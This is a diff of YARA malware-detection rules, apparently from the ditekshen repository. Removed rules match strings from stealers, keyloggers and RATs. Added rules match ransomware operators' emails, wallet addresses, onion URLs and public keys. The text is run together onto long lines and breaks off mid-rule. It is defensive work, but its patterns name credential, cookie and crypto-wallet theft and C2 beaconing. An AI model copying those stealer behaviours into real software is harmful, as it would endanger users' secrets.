= "ditekSHen" - id = "e94b6d67-137c-5cfb-9c59-fbeb6cd85f0a" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects files referencing identities associated with Babuk ransomware" + author = "ditekShen" + id = "139cea69-9661-5cb7-bf74-a14e3556c759" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1539-L1565" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "6f742e8d9d555b44daaa09835f599c99e16cd39bb106c8f43fbbca7093de462e" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L410-L426" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "129b1364bb59423aab1f5f67a4c2d2a76a9c4f55aa6aa1e59bcebc717a14ee19" score = 75 - quality = 73 - tags = "FILE" + quality = 61 + tags = "" strings: - $x1 = /ExtKeylogger(Start|Stop)/ fullword ascii - $x2 = /ExtService(Add|Delete|Start|Stop)/ fullword ascii - $x3 = /ExtRegKey(Add|Del)/ fullword ascii - $x4 = /ExtRegItem(Add|Del)/ fullword ascii - $x5 = "ExtUnload" fullword ascii - $s1 = "Local Security Process" fullword wide - $s2 = "Global%s%d" fullword wide - $s3 = "%s%s_%d.dat" fullword wide - $s4 = "\\AppIni" fullword wide - $s5 = "%s.tmp" fullword wide - $s6 = "\\SetupUi" fullword wide - $s7 = "%s|%s|%s|%s" fullword wide - $s8 = "\\ExtInfo" fullword wide - $cnc1 = "/v?m=" fullword ascii - $cnc2 = "%s&i=%d" fullword ascii - $cnc3 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75" fullword ascii - $cnc4 = "Content-Length: %d" fullword ascii + $s1 = "mitnickd@ctemplar.com" ascii wide nocase + $s2 = "zar8b@tuta.io" ascii wide nocase + $s3 = "recover300dollars@gmail.com" ascii wide nocase + $s4 = "support.3330@gmail.com" ascii wide nocase + $s5 = "decryptdelta@gmail.com" ascii wide nocase + $s6 = "pyotrmaksim@gmail.com" ascii wide nocase + $s7 = "retrievedata300@gmail.com" ascii wide nocase + $s8 = "3JG36KY6abZTnHBdQCon1hheC3Wa2bdyqs" ascii wide + $s9 = "46zdZVRjm9XJhdjpipwtYDY51NKbD74bfEffxmbqPjwH6efTYrtvbU5Et4AKCre9MeiqtiR51Lvg2X8dXv1tP7nxLaEHKKQ" ascii wide condition: - uint16(0)==0x5a4d and (3 of ($x*) or 7 of ($s*) or all of ($cnc*) or (1 of ($x*) and 4 of ($s*))) + any of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Ircbot : FILE +rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Rapid { meta: - description = "IRCBot payload" - author = "ditekSHen" - id = "69739d82-9760-5c4e-bf9e-60c60617a12a" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects files referencing identities associated with Rapid ransomware" + author = "ditekShen" + id = "a1c6f3c0-2fec-5d96-9965-8129a843ae90" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1567-L1596" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "1ea640202cfbd0c3425a192c45938f632dc644f41c7974118e7491b026122818" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L428-L436" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "ea82a3fcb1d836e1c250e9a576064e1babdb82b4970555260af2eb68726cfd16" score = 75 - quality = 67 - tags = "FILE" + quality = 73 + tags = "" strings: - $s1 = ".okuninstall" fullword wide - $s2 = ".oksnapshot" fullword wide - $s3 = "\\uspread.vbs" fullword wide - $s4 = "KEYLogger" ascii nocase - $s5 = "GetKeyLogs" fullword ascii - $s6 = "GetLoocationInfo" fullword ascii - $s7 = "CaputerScreenshot" fullword ascii - $s8 = "get_SCRIPT_DATA" fullword ascii - $s9 = /irc_(server|nickname|password|channle)/ fullword ascii - $s10 = "machine_screenshot" fullword ascii - $s11 = "CollectPassword" fullword ascii - $s12 = "USBInfection" fullword ascii nocase - $cnc1 = "&command=UpdateAndGetTasks&machine_id=" wide - $cnc2 = "&machine_os=1&privateip=" wide - $cnc3 = "&command=InsertTaskExecution&excuter_id=" wide - $cnc4 = "&command=RegisterNewMachine" wide - $cnc5 = "&command=UpdateNewMachine" wide - $cnc6 = "&command=GetPayloads&keys=" wide - $cnc7 = "&command=SaveSnapshot" wide - $pdb = "\\Projects\\USBStarter\\USBStarter\\obj\\Release\\USBStarter.pdb" ascii + $s1 = "jimmyneytron@tuta.io" ascii wide nocase condition: - uint16(0)==0x5a4d and (7 of ($s*) or 3 of ($cnc*) or ($pdb and 2 of them )) + any of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Apocalypse : FILE +rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Satana { meta: - description = "Apocalypse infostealer payload" - author = "ditekSHen" - id = "f1fa6642-fe42-57e7-a1bc-0f59815049f8" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects files referencing identities associated with Satana ransomware" + author = "ditekShen" + id = "a362d4ca-d475-5392-a3ac-45337425d8e7" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1598-L1615" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "d18ac492ad57cf390f20693cb47ae2c6e3dbdd921fa846130a4bc20047e1aa27" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L438-L447" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "6d82e2497044518cee1b56da85f1ad6ac7934eec9ca68501932d55add4236d45" score = 75 - quality = 75 - tags = "FILE" + quality = 73 + tags = "" strings: - $s1 = "OpenClipboard" fullword ascii - $s2 = "SendARP" fullword ascii - $s3 = "GetWebRequest" fullword ascii - $s4 = "DotNetGuard" fullword ascii - $s5 = "set_CreateNoWindow" fullword ascii - $s6 = "UploadFile" fullword ascii - $s7 = "GetHINSTANCE" fullword ascii - $s8 = "Kill" fullword ascii - $s9 = "GetProcesses" fullword ascii - $s10 = "get_PrimaryScreen" fullword ascii + $s1 = "adamadam@ausi.com" ascii wide nocase + $s2 = "XsrR2he2Z8un5ysGWnJ1wveZRPRS96XEoX" ascii wide condition: - uint16(0)==0x5a4d and all of them + any of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Osno : FILE +rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Zeppelin { meta: - description = "Osno ransomware and infostealer payload" - author = "ditekSHen" - id = "25ed5ad4-804a-5608-b6fe-a811ca6744d8" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects files referencing identities associated with Zeppelin ransomware" + author = "ditekShen" + id = "f3bbfcd0-c66c-589e-ae04-904314d6a869" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1617-L1652" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "3df59c306017001467a5f237db2ab37d97c34116558e18420a6a1f01f08f520f" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L449-L462" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "66dd92423cfac32de4bea95ad0c9594cb449dc897cc6315d782c1db6de7dc5b1" score = 75 - quality = 73 - tags = "FILE" + quality = 63 + tags = "" strings: - $s1 = ".HolyGate+<>c+<<FinalBoss>" ascii - $s2 = /Osno(Keylogger|Stealer|Ransom)/ wide - $s3 = "password,executeWebhook('Account credentials" wide - $s4 = "-Name Osno -PropertyType" wide - $s5 = "process.env.hook" ascii - $s6 = "Stealer.JSON.JsonValue" ascii - $s7 = "<DetectBrowserss>b_" ascii - $s8 = "<TryGetDiscordPath>b_" ascii - $s9 = "antiVM" fullword ascii - $s10 = "downloadurl" fullword ascii - $s11 = "set_sPassword" fullword ascii - $txt0 = "{0} {1} .txt" fullword wide - $txt1 = "\\ScanningNetworks.txt" fullword wide - $txt2 = "\\SteamApps.txt" fullword wide - $txt3 = "-ErrorsLogs.txt" fullword wide - $txt4 = "-keylogs.txt" fullword wide - $txt5 = "Hardware & Soft.txt" fullword wide - $cnc0 = "/csharp/" ascii wide - $cnc1 = "token=" ascii wide - $cnc2 = "×tamp=" ascii wide - $cnc3 = "&session_id=" ascii wide - $cnc4 = "&aid=" ascii wide - $cnc5 = "&secret=" ascii wide - $cnc6 = "&api_key" ascii wide - $cnc7 = "&session_key=" ascii wide - $cnc8 = "&type=" ascii wide + $s1 = "kd8eby0@inboxhub.net" ascii wide nocase + $s2 = "kd8eby0@onionmail.org" ascii wide nocase + $s3 = "kd8eby0@nuke.africa" ascii wide nocase + $s4 = "uspex1@cock.li" ascii wide nocase + $s5 = "uspex2@cock.li" ascii wide nocase + $s6 = "China.Helper@aol.com" ascii wide nocase condition: - ( uint16(0)==0x5a4d and (6 of ($s*) or 4 of ($txt*) or (4 of ($s*) and 2 of ($txt*)))) or (7 of ($cnc*)) + any of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Betabot : FILE +rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_STOP { meta: - description = "BetaBot payload" - author = "ditekSHen" - id = "377c500c-5727-5bea-ac46-cb69c868a607" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects files referencing identities associated with STOP ransomware" + author = "ditekShen" + id = "b2279a7f-a187-5a44-bf1f-87c21b3ffa4f" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1654-L1666" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "e594d01874ee622169d6708ddc6cfde7f1d26d2bea1604961dc860700e8a1d5d" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L464-L480" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "f0d902edbcbe8ff8f3a751b649554499933b06471920c86a9eea3de23890b4bc" score = 75 - quality = 73 - tags = "FILE" + quality = 57 + tags = "" strings: - $s1 = "__restart" fullword ascii - $s2 = "%SystemRoot%\\SysWOW64\\tapi3.dll" fullword wide - $s3 = "%SystemRoot%\\system32\\tapi3.dll" fullword wide - $s4 = "publicKeyToken=\"6595b64144ccf1df\"" ascii - $s5 = "VirtualProtectEx" fullword ascii + $s1 = "gorentos@bitmessage.ch" ascii wide nocase + $s2 = "gorentos2@firemail.cc" ascii wide nocase + $s3 = "manager@mailtemp.ch" ascii wide nocase + $s4 = "helprestoremanager@airmail.cc" ascii wide nocase + $s5 = "supporthelp@airmail.cc" ascii wide nocase + $s6 = "managerhelper@airmail.cc" ascii wide nocase + $s7 = "helpteam@mail.ch" ascii wide nocase + $s8 = "helpmanager@airmail.cc" ascii wide nocase + $s9 = "support@sysmail.ch" ascii wide nocase condition: - uint16(0)==0x5a4d and filesize <600KB and all of them + any of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Wshratplugin : FILE +rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Diavol { meta: - description = "WSHRAT keylogger plugin payload" - author = "ditekSHen" - id = "45c4fc87-6c45-5cd7-9fc4-7d3ea664a740" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects files referencing identities associated with Diavol ransomware" + author = "ditekShen" + id = "ea499318-ed5b-5597-8f9f-4ece7942cf4b" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1668-L1685" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "3feeab43b58b533b7d2d41a71f2107e6f05b9c54ff805607843d253cadbe9384" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L482-L491" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "c72f4d7854f7ba813c4872d47aad69edb8c2927f380b9213ced1aca52454eee5" score = 75 - quality = 75 - tags = "FILE" - snort_sid = "920010-920012" - clamav_sig = "MALWARE.Win.Trojan.WSHRAT-KLG" + quality = 71 + tags = "" strings: - $s1 = "GET /open-keylogger HTTP/1.1" fullword wide - $s2 = "KeyboardChange: nCode={0}, wParam={1}, vkCode={2}, scanCode={3}, flags={4}, dwExtraInfo={6}" wide - $s3 = "MouseChange: nCode={0}, wParam={1}, x={2}, y={3}, mouseData={4}, flags={5}, dwExtraInfo={7}" wide - $s4 = "sendKeyLog" fullword ascii - $s5 = "saveKeyLog" fullword ascii - $s6 = "get_TotalKeyboardClick" fullword ascii - $s7 = "get_SessionMouseClick" fullword ascii - $pdb = "\\Android\\documents\\visual studio 2010\\Projects\\Keylogger\\Keylogger\\obj\\x86\\Debug\\Keylogger.pdb" ascii + $s1 = "/noino.5fws6uqv5byttg2r//:sptth" ascii wide nocase + $s2 = "https://r2gttyb5vqu6swf5.onion/" ascii wide nocase condition: - uint16(0)==0x5a4d and filesize <100KB and 4 of them + any of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Revengerat : FILE +rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Chaos { meta: - description = "RevengeRAT and variants payload" - author = "ditekSHen" - id = "7d725050-108c-54b5-978e-2dd2124f5b0f" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects files referencing identities associated with Chaos ransomware" + author = "ditekShen" + id = "18476655-1468-569e-b518-ebeaf289fbd6" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1687-L1713" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "be9e50052f45b94d5995db723dd64d16a91c5ba0d3f589c018155c0cce45124f" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L493-L511" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "6e8dce1622dbccca6aa15040b49fc9ea05ec7192f8a79409fd7414690102d09a" score = 75 - quality = 75 - tags = "FILE" - snort_sid = "920000-920002" + quality = 67 + tags = "" strings: - $l1 = "Lime.Connection" fullword ascii - $l2 = "Lime.Packets" fullword ascii - $l3 = "Lime.Settings" fullword ascii - $l4 = "Lime.NativeMethods" fullword ascii - $s1 = "GetAV" fullword ascii - $s2 = "keepAlivePing!" fullword ascii wide - $s3 = "Revenge-RAT" fullword ascii wide - $s4 = "*-]NK[-*" fullword ascii wide - $s5 = "RV_MUTEX" fullword ascii wide - $s6 = "set_SendBufferSize" fullword ascii - $s7 = "03C7F4E8FB359AEC0EEF0814B66A704FC43FB3A8" fullword ascii - $s8 = "5B1EE7CAD3DFF220A95D1D6B91435D9E1520AC41" fullword ascii - $s9 = "\\RevengeRAT\\" ascii - $q1 = "Select * from AntiVirusProduct" fullword ascii wide - $q2 = "SELECT * FROM FirewallProduct" fullword ascii wide - $q3 = "select * from Win32_Processor" fullword ascii wide + $s1 = "anenomous31@gmail.com" ascii wide nocase + $s2 = "daengsocietyteam@gmail.com" ascii wide nocase + $s3 = "RansHelp@tutanota.com" ascii wide nocase + $s4 = "18vhBpgPhZrjJkbuT2ZyUXAnJavaJcTwEd" ascii wide + $s5 = "bc1qlnzcep4l4ac0ttdrq7awxev9ehu465f2vpt9x0" ascii wide + $s6 = "8AFtPnreZp28xoetUyKiQvVtwrov9PtEbMyvczdNZpBN45EUbEsrE8xYVp4NNqPrtxNjQwn3PbW3FG16EPYcPpKzMU78xN6" ascii wide + $s7 = "bc1qu6tharwawwny28z9fj6nrxg5cqftaep9ap6z2v" ascii wide + $s8 = "bambolina2021@virgilio.it" ascii wide nocase + $s9 = "1EoyuvcXdAQQvStkoJZ38vdGm84StD7wjm" ascii wide + $s10 = "1G395PJs8ciqvXPZEYb1LfUGPix9h9n3oQ" ascii wide condition: - uint16(0)==0x5a4d and ((1 of ($l*) and 3 of ($s*)) or ( all of ($q*) and 3 of ($s*)) or 3 of ($s*)) + any of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_TRAT : FILE +rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Maze { meta: - description = "TRAT payload" - author = "ditekSHen" - id = "15f80970-6bc7-5e29-86d6-f7529a10d227" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects files referencing identities associated with Maze ransomware" + author = "ditekShen" + id = "7cc11912-e5d2-5477-ab9b-0c470bb5e1d6" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1715-L1730" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "b8474c74cd9f21fcb3a8ae1c7a7a0a801f0f117782e9803cdae39daf7f0f8b2f" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L513-L521" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "46070d46c502837e5fb87d0fb75244a1a21e90b4e0ce4b73c408b8dc67fe1bcb" score = 75 - quality = 75 - tags = "FILE" - clamav_sig = "MALWARE.Win.Trojan.TRAT" + quality = 73 + tags = "" strings: - $s1 = "^STEAM_0:[0-1]:([0-9]{1,10})$" fullword wide - $s2 = "^7656119([0-9]{10})$" fullword wide - $s3 = "Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)" ascii - $s4 = "\"schtasks\", \"/delete /tn UpdateWindows /f\");" ascii - $s5 = "ProcessWindowStyle.Hidden" ascii - $s6 = "+<>c+<<ListCommands>" ascii - $s7 = "//B //Nologo *Y" fullword ascii + $s1 = "getmyfilesback@airmail.cc" ascii wide nocase condition: - uint16(0)==0x5a4d and 5 of them + any of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Cryptbot : FILE +rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Lokilocker { meta: - description = "CryptBot/Fugrafa stealer payload" - author = "ditekSHen" - id = "248961dd-b98d-509b-92a0-1670b7687e25" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects files referencing identities associated with LokiLocker ransomware" + author = "ditekShen" + id = "ab2cf390-4544-54ed-913c-d463d0f1bdb0" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1732-L1766" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "6322b8b1ad210fac4475c194e060046538d4174f69a7c0e3618646d262cd33bd" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L523-L531" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "1ab9a2ce7e39d916b389e2adb975e3558ddb7d87f7e9494e6b20cb25edd3cb84" score = 75 - quality = 69 - tags = "FILE" - snort2_sid = "920110" - snort3_sid = "920108" - clamav_sig = "MALWARE.Win.Trojan.CryptBot" + quality = 73 + tags = "" strings: - $s1 = "Username: %wS" fullword wide - $s2 = "Computername: %wS" fullword wide - $s3 = "/c rd /s /q %" wide - $s4 = "IP: N0t_IP" fullword wide - $s5 = "Country: N0t_Country" fullword wide - $s6 = "password-check" fullword ascii - $s7 = "Content-Disposition: form-data; name=\"file\"; filename=\"" ascii wide - $s8 = "[ %wS ]" wide - $s9 = "EXE_PATH:" wide - $s10 = "Username (Computername):" wide - $s11 = "Operating system language:" wide - $s12 = "/index.php" wide - $f1 = "*ledger*.txt" fullword wide - $f2 = "*crypto*.xlsx" fullword wide - $f3 = "*private*.txt" fullword wide - $f4 = "*wallet*.dat" fullword wide - $f5 = "*pass*.txt" fullword wide - $f6 = "*bitcoin*.txt" fullword wide - $p1 = "%USERPROFILE%\\Desktop\\*.txt" fullword wide - $p2 = "%USERPROFILE%\\Desktop\\secret.txt" fullword wide - $p3 = "%USERPROFILE%\\Desktop\\report.doc" fullword wide - $pattern1 = /(files_|_Files)\\(_?)(cookies|cryptocurrency|forms|passwords|system_info|screenshot|screen_desktop|information|files|wallet|cc|Coinomi)\\?(\.txt|\.jpg|\.jpeg)?/ ascii wide nocase - $pattern2 = /%(s|ws)\\%(s|ws)\\(Login Data|Cookies|Web Data)/ fullword wide - $pattern3 = /(_AllPasswords_list.txt|_AllForms_list.txt|_AllCookies_list.txt|_All_CC_list.txt|_Information.txt|_Info.txt|_Screen_Desktop.jpeg)/ fullword wide + $s1 = "Unlockpls.dr01@yahoo.com" ascii wide nocase condition: - uint16(0)==0x5a4d and ((5 of ($s*) and 1 of ($p*)) or (4 of ($s*) and 1 of ($f*) and 1 of ($p*)) or (2 of ($pattern*) and 3 of ($s*)) or (#pattern1>6 and (2 of ($s*) or 1 of ($p*)))) + any of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Matiex : FILE +rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Blackcat { meta: - description = "Matiex/XetimaLogger keylogger payload" - author = "ditekSHen" - id = "61803e0c-8f6a-5ded-855a-ff26eed1384f" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects files referencing identities associated with BlackCat ransomware" + author = "ditekShen" + id = "21038f8e-73cd-59d2-9eb3-6947d263ab79" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1768-L1788" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "62b45c43d99bef93a6c0e72200b869fdce331f8fa325640df7d8b72af56a3ef2" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L533-L569" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "eb0a4d26170f030775f778cc524749ca283dfa983f84bd364e4df6321eb96cf1" score = 75 quality = 73 - tags = "FILE" - clamav_sig = "MALWARE.Win.Trojan.MatiexKeylogger" + tags = "" strings: - $id = "--M-A-T-I-E-X--K-E-Y-L-O-G-E-R--" ascii wide - $s1 = "StartKeylogger" fullword ascii - $s2 = "_KeyboardLoggerTimer" ascii - $s3 = "_ScreenshotLoggerTimer" ascii - $s4 = "_VoiceRecordLogger" ascii - $s5 = "_ClipboardLoggerTimer" ascii - $s6 = "get_logins" fullword ascii - $s7 = "get_processhackerFucked" fullword ascii - $s8 = "_ThePSWDSenders" fullword ascii - $pdb = "\\Before FprmT\\Document VB project\\FireFox Stub\\FireFox Stub\\obj\\Debug\\VNXT.pdb" ascii + $pk1 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0B0ni9tyKHSJmU6gc1iRwNTklYocRKmLPUyOthUIHnZHwL1M2pKlMBwXx81bboVS6Cf8YaCoWW1bCmLwPX421sG22xkmtMy/SfiG8jaYtYiA7r7hOdIUnJgRo6vDvNafZlSD32tFVVjuX8Ec79qj2FM7/MmNcseUgpIQaEACuZcSzMK+jZA4BLT9b5Akkec2hPOXGTPmgaXjL9EJE+0rhNZcm/m6xe4/S5eL2kSCVsNUeG8xWuSO2kDRS8xY3rtJOCNEdqZp1rxzTkhgj3hHqr7AoFAkxNblQ538JcdF5+CGINxckA/ldmP7wQd92tmFk2vcl2WeQykFwMM6L6MsQwIDAQAB" ascii wide + $pk2 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA49gzJwP9UwEuYQZT1cdgSpxG6z8TVNLPfS4Qwd3vpWHEOAuvi8JGVEpHPGZnrD1QFoDLSTva3PZ4mqtIVO79GOYb5uQkP7LdJGWbLAjUGptVGmB67jKOOLLrjmuBDHpJXSOGG/vw5vajr4MhNnsvoBLPOC0AOzPM6GBDgKdC9zdUGNEreAjOR4neqwZ2jfYl5k5e3eRF86hmWhGXJQaU1uTmDJwgQIzmUZKo+YCfAHbEbSA4HhsumJfw0MJN7RfKPEQkEVvRIBibHnJuIp1bxk3IGPzTCbyQLHMVLz8wgElEexu8/aO3FT6w4uPY3qD+r2W+ri7xIdEN/pTz6TBKvwIDAQAB" ascii wide + $pk3 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA8tKPNFCbU5Unr9jxlTk4RmUdVhcRydJFts6hMpLzcAXIR2yxiNC0QiF4UovAIpGwX6kxOW7kOaOvABJQP6QENMNSg030VlLoTP+ndfFwIt+X+RUflG4UWPE8yu+kzGpCwp7UjX+hD/SpFbSFRRh3BvL3vEq04DzE0AzifEBE4yxKpLsrMsXyZzWy9Nza8NTO2jrBxoEVM2xCLkULp0wZEPDwgeKGkoxMzqavVWBC+Vxi0atKstbo7/TloNenPagl/eUErk9C8tT67zKgbEh3TFtREgaxa/yrjBvN48BU8JGGxLxy4AeGF0vOUdD0WkJsWYzLVg21ApgJaCDr5zDPuQIDAQAB" ascii wide + $pk4 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEApw3tWdMaWJvNf2Mejy5H0Y6kuj+lstNpwFyismGDEYhWKPps9c68xl+84o6uLKfqPzNvLnSxlVa6DitcJGeKJEQkzN+C1e1KsfzM63jHybREB2hs+dHbqBq4dbamIQcTrrr4mKzuHJ7aok4mlpRx2Un1XOJaodoV7xOHO7ui5v6uK39MJ3rvitSEBvv5oI0WDlp3IFmtd6UM6r2nygY1ncAUuasalZgF1Vaz7VXOWyX2ReQHbYWWRCR1qyKMQcBtjT5POXx9B8ek1pnU4p65kGe9M794Bhhh20GN24gY5a+zwXwstaNTO9luwd4xjjRQAVsDgjrjkzti27G11ICn6wIDAQAB" ascii wide + $pk5 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAq8kj5LQJngPsY7AhTaJsUXc5FrSGeKS5gw5PIqk2QPM9TY6+us8TRRzWZ7rGk1zns2klpzpRMUzLIqB8lpCkJjqkOUGfgqs+HN4VIOpoJgFY897xstJCxTc+8pYQEsSqClxJllscU0okkLSQqndIR2Gznlg3qfcwyncJAFBInyqM+L4kbwCQZ6x5HNiLe2lJn8RP2aDiMI+RS1uLYron2G7rxDTUQnxThMtgLAeko8ulaB3TpB0g4lmHCenkEZeBNs81986+MjHnv7KkiscZ7ZrezKjNaIxRs8BAcD9y+Q9QQxCvZMS01ITNXcgiItbA4dsGq1fPJ42yBkkiIodsEQIDAQAB" ascii wide + $pk6 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqEoytNrMZRoqyIsFpcjiqVWpuV+cC9jS1umXNg/AnJF/xE7LONAmb1p8Dsx1igIUd65IXfFUxmJjFO5hf8LIBzvjUbBll4lbSgGTAUHa3Jbmr/imle6QftmY32J7dDb4WuJUOx+vLNT0I72CESiyotSzwgvLwjyubTmzTJMkqviYOcgDj45NVOx669cG6FWEaJo3PUZzRx9LS6pkOn8tW+W4NzmHMcrma+LOakan7NU6Khv5Hf5ARNsAA+KvDfP1WXJ/VsLXj6x8SdX0v2iS+y58ehUUmlxc8HNsYdOGFwrwYX9zLyJDedsbPg02c4AE4KXt8vH4+j4lVFtruSy4vwIDAQAB" ascii wide + $pk7 = 